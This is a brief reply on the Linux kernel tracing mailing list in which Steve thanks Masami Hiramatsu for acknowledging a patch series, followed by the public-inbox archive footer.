  To: Masami Hiramatsu (Google)
  Cc: linux-kernel, linux-trace-kernel, Mark Rutland, Mathieu Desnoyers,
	Andrew Morton, Linus Torvalds, Sebastian Andrzej Siewior,
	John Ogness, Thomas Gleixner, Peter Zijlstra, Julia Lawall,
	Yury Norov
In-Reply-To: <20260622234416.9f85ff87b81bcfb9776c73a6@kernel.org>

On Mon, 22 Jun 2026 23:44:16 +0900
Masami Hiramatsu (Google) <mhiramat@kernel.org> wrote:

> The series looks good to me.
> 
> Acked-by: Masami Hiramatsu (Google) <mhiramat@kernel.org>

Thanks!

-- Steve

^ permalink raw reply


This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox